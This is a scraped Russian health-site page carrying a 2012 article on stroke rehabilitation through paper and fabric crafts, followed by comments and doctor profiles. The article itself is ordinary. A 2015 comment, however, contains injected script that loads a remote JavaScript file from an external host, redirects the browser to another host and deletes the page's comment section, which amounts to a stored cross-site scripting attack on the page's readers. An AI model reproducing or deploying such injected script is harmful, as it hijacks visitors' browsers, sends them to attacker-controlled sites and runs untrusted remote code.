Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Инсульт – не приговор  >>  Инсульт – не приговор
 
Обратная связь
 

Инсульт – не приговор

Размер шрифта
15 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Лечебная физкультура может быть интересной. А восстановление движений после инсульта – реальная возможность.

1

После перенесенного нарушения мозгового кровообращения пациенты долго не могут справиться с полной или частичной потерей движений в конечностях. При инсультах могут погибать клетки нервных центров, управляющих нашими движениями. Но гибель этих нервных клеток не всегда является приговором полной неподвижности. Дело в том, что функции погибших нейронов могут взять на себя другие клетки, и помочь им в этом может лечебная физкультура.

Лечебная физкультура, как метод реабилитации (восстановления) после перенесенного инсульта используется очень давно. Но многие забывают, что регулярные однообразные движения могут попросту надоесть. И при выписке из больницы большинство пациентов забывает про регулярные упражнения. А ведь именно в них и заключается рецепт восстановления!

Решение можно найти в поделках. Именно мелкие поделки из бумаги или ткани помогают незаметно задействовать мелкую моторику. Когда человек увлечен созданием бумажных цветов или бумажных фонариков, он не прилагает дополнительных усилий для действия, его сознание целиком поглощено предметом. Особенно хорошо удается увлечь такими поделками бабушек и дедушек, имеющих внуков. Как увлечься созданием бумажных фонариков для любимой внучки?

1

Давно замечено, что человек способен на большее, если не сосредоточен на собственных усилиях.

Такая работа с мелкими деталями непременно оставляет положительный эффект: в нервных клетках остается «память» о проделанной работе, и, в следующий раз, движения станут получаться лучше. А при дальнейшем повторении таких игровых упражнений функция нервных центров, погибших в результате инсульта, может перейти к новым нейронам. Поэтому качество жизни после инсульта находится целиком в руках (в том числе и буквально) самих пациентов.

 


Сюжеты по теме:
Жизнь с чистого листа. Как восстановить движения после инсульта

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.